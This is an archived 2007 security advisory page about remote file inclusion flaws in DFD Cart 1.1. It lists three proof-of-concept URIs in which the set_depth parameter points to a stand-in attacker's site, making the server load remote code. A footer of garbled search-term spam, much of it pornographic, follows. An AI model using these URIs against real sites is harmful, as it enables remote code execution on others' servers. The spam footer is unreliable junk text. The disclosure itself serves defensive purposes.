about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , DFD Cart Multiple Remote File Include Vulnerabilities


Title DFD Cart Multiple Remote File Include Vulnerabilities
Published 2007-09-24-12:00AM
Updated 2007-09-24-10:49PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  BiNgZa is credited with the discovery of these vulnerabilities.
Vulnerable  DFD Cart DFD Cart 1.1
Not Vulnerable  
Code  An attacker can exploit these issues via a browser.The following proof-of-concept URIs are available:http://www.example.com/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://attacker's site
http://www.example.com/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://attacker's site
http://www.example.com/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://attacker's site
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 15:53:36 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news searc TCLhttpd 3 Bigwetbutt xxl girls www.daocpl news searc indian mas www.hotmov wwww.xxxx. WWW.Sex18. Cerita ser booiywood. www. sexg WwW.Girlse /search/ex linux loac mambo Remo www.loveyf t401t phpbb foru sexualpict #icehacker /component maxcpm.inf maxcpm.inf xpl%2Fexpl dl 624 xpl/exploi SEXVIDES Xxx porno school gir Www.Sexy g mail enabl news for c www.lt99.c www.twxsw. mambo Remo video sex maxcpm.inf sex free m maxcpm.inf maxcpm.inf india sex. Remote Fil Livesexpho india sex. sexy .com maxcpm.inf sex born Www.Sexved